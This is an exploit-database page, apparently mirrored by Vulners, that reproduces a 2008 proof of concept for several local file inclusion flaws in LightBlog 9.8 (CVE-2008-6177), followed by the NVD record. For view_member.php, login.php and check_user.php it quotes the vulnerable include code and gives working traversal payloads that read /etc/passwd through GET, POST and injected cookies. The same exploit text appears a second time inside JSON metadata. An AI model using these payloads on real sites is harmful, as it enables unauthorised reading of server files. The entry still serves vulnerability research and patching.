Search...

LightBlog 9.8 - GET & POST & COOKIE Multiple LFI Vulnerabilities

2008-10-21T00:00:00

ID EDB-ID:6797
Type exploitdb
Reporter JosS
Modified 2008-10-21T00:00:00

Description

LightBlog 9.8 (GET,POST,COOKIE) Multiple LFI Vulnerabilities. CVE-2008-6177. Webapps exploit for php platform

                                        
                                            # LightBlog 9.8 (GET,POST,COOKIE) Multiple Local File Inclusion Vulnerabilies
# url: http://www.publicwarehouse.co.uk/php_scripts/lightblog.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

vuln file: view_member.php
vuln code:
8: if(isset($_GET['username']) and file_exists("./accounts/".$_GET['username'].".php")){
x: ...
24: include("./accounts/{$username_get}.php");
39: }

PoC: GET view_member.php?username=[file]%00
ExP: GET view_member.php?username=../../../../../../../../../../etc/passwd%00

---

vuln file: login.php
vuln code:
18: include("./accounts/".$_POST['username_post'].".php");

PoC: POST login.php?username_post=[file]%00
ExP: POST login.php?username_post=../../../../../../../../../../etc/passwd%00

---

vuln file: check_user.php
vuln code: 
6: if(isset($_COOKIE['Lightblog_username']) and isset($_COOKIE['Lightblog_password'])){

   $username_cookie = $_COOKIE['Lightblog_username'];
   $password_cookie = $_COOKIE['Lightblog_password'];

   if(file_exists("./accounts/{$username_cookie}.php")){
13:include("./accounts/{$username_cookie}.php");

PoC: javascript:document.cookie = "Lightblog_username=[file]%00; path=/"; document.cookie = "Lightblog_password=JosS;
     path=/";
ExP: javascript:document.cookie = "Lightblog_username=../../../../../../../../../../etc/passwd%00; path=/";
     document.cookie = "Lightblog_password=JosS; path=/";

---

and more ...
hack0wn :D

# milw0rm.com [2008-10-21]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:6797", "type": "exploitdb", "bulletinFamily": "exploit", "title": "LightBlog 9.8 - GET & POST & COOKIE Multiple LFI Vulnerabilities", "description": "LightBlog 9.8 (GET,POST,COOKIE) Multiple LFI Vulnerabilities. CVE-2008-6177. Webapps exploit for php platform", "published": "2008-10-21T00:00:00", "modified": "2008-10-21T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6797/", "reporter": "JosS", "references": [], "cvelist": ["CVE-2008-6177"], "lastseen": "2016-02-01T00:40:50", "viewCount": 5, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2016-02-01T00:40:50", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6177"]}], "modified": "2016-02-01T00:40:50", "rev": 2}, "vulnersScore": 6.2}, "sourceHref": "https://www.exploit-db.com/download/6797/", "sourceData": "# LightBlog 9.8 (GET,POST,COOKIE) Multiple Local File Inclusion Vulnerabilies\n# url: http://www.publicwarehouse.co.uk/php_scripts/lightblog.php\n#\n# Author: JosS\n# mail: sys-project[at]hotmail[dot]com\n# site: http://spanish-hackers.com\n# team: Spanish Hackers Team - [SHT]\n#\n# This was written for educational purpose. Use it at your own risk.\n# Author will be not responsible for any damage.\n\nvuln file: view_member.php\nvuln code:\n8: if(isset($_GET['username']) and file_exists(\"./accounts/\".$_GET['username'].\".php\")){\nx: ...\n24: include(\"./accounts/{$username_get}.php\");\n39: }\n\nPoC: GET view_member.php?username=[file]%00\nExP: GET view_member.php?username=../../../../../../../../../../etc/passwd%00\n\n---\n\nvuln file: login.php\nvuln code:\n18: include(\"./accounts/\".$_POST['username_post'].\".php\");\n\nPoC: POST login.php?username_post=[file]%00\nExP: POST login.php?username_post=../../../../../../../../../../etc/passwd%00\n\n---\n\nvuln file: check_user.php\nvuln code: \n6: if(isset($_COOKIE['Lightblog_username']) and isset($_COOKIE['Lightblog_password'])){\n\n $username_cookie = $_COOKIE['Lightblog_username'];\n $password_cookie = $_COOKIE['Lightblog_password'];\n\n if(file_exists(\"./accounts/{$username_cookie}.php\")){\n13:include(\"./accounts/{$username_cookie}.php\");\n\nPoC: javascript:document.cookie = \"Lightblog_username=[file]%00; path=/\"; document.cookie = \"Lightblog_password=JosS;\n path=/\";\nExP: javascript:document.cookie = \"Lightblog_username=../../../../../../../../../../etc/passwd%00; path=/\";\n document.cookie = \"Lightblog_password=JosS; path=/\";\n\n---\n\nand more ...\nhack0wn :D\n\n# milw0rm.com [2008-10-21]\n", "osvdbidlist": ["49213", "52123", "49214"]}

{"cve": [{"lastseen": "2020-10-03T11:51:05", "description": "Multiple directory traversal vulnerabilities in LightBlog 9.8, when magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) username parameter to view_member.php, (2) username_post parameter to login.php, and the (3) Lightblog_username cookie parameter to check_user.php.", "edition": 3, "cvss3": {}, "published": "2009-02-19T16:30:00", "title": "CVE-2008-6177", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6177"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:publicwarehouse:lightblog:9.8"], "id": "CVE-2008-6177", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6177", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:publicwarehouse:lightblog:9.8:*:*:*:*:*:*:*"]}]}